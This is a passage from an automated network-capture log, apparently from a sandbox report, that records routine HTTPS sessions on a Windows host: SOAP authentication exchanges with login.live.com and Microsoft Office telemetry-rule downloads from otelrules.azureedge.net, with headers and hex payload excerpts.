                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:42 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:42 UTC568INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Expires: Mon, 28 Oct 2024 21:01:42 GMT
                                                                                                                                                                                                                                                                                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                x-ms-route-info: C555_BAY
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: dca55170-a58c-4aeb-9eba-933988c78812
                                                                                                                                                                                                                                                                                                                                PPServer: PPV: 30 H: PH1PEPF000181B1 V: 0
                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:42 GMT
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Length: 1918
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:42 UTC1918INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                130192.168.2.54990813.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:42 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:42 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:42 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 1368
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BDDC22447"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 207ff7bf-701e-006f-1357-27afc4000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210242Z-16849878b78z2wx67pvzz63kdg00000004800000000044q0
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:42 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                131192.168.2.54990720.190.159.0443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:42 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/soap+xml
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                                                                                                Content-Length: 4775
                                                                                                                                                                                                                                                                                                                                Host: login.live.com
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:42 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:42 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Expires: Mon, 28 Oct 2024 21:01:42 GMT
                                                                                                                                                                                                                                                                                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                x-ms-route-info: C555_SN1
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 74670dc8-e6d5-4534-ae06-820a497eca07
                                                                                                                                                                                                                                                                                                                                PPServer: PPV: 30 H: SN1PEPF0002F8FC V: 0
                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:42 GMT
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Length: 11412
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:42 UTC11412INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                132192.168.2.54990913.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:42 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:42 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:42 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 1401
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BE055B528"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 7f6d22c4-101e-0046-21f0-2591b0000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210242Z-15b8d89586f4zwgbgswvrvz4vs00000006t000000000gfyn
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:42 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                133192.168.2.54991013.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:42 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:42 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:42 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 1364
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BE1223606"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: eff8debc-001e-0065-199c-270b73000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210242Z-16849878b78qf2gleqhwczd21s00000005qg00000000phf7
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:42 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                134192.168.2.54991113.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:42 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:42 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:42 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 1397
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BE7262739"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: c05ef2b3-701e-005c-2d6a-27bb94000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210242Z-r197bdfb6b4b4pw6nr8czsrctg000000067000000000f8xn
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:42 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                135192.168.2.54991213.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:43 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:43 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:43 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 1360
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BDDEB5124"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: cb3ec3ab-c01e-0014-40b8-26a6a3000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210243Z-16849878b78tg5n42kspfr0x4800000005kg00000000d2eb
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:43 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                136192.168.2.54991513.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:43 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:43 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:43 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
